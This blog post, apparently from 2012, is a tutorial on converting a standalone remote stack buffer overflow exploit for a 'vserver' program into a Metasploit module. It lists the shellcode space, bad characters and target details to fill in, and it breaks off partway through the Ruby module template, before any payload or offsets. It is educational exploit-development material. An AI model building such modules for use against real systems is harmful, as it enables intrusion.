Posts

Showing posts from March, 2012

Build Metasploit Module (Windows Exploit Development)

Image
This is the continuation of my previous post  Windows Exploit Development (Remote Stack BoF ). Let's try to convert the standalone exploit for vserver to a metasploit module. If you think that this task is complicated you're wrong because what we need, is only a template taken from this corelan tutorial and edit few things. What we edit: Information details. How much space we have for the shellcode (2062 bytes). Bad chars. Target machine, return address and offset. require 'msf/core' class Metasploit3 < Msf::Exploit::Remote include Msf::Exploit::Remote::Tcp def initialize(info = {}) super(update_info(info, 'Name' => 'Vserver remote bof', 'Description' => %q{this is a description}, 'Author' => [ 'SecurityObscurity' ], 'Version' => '$Revision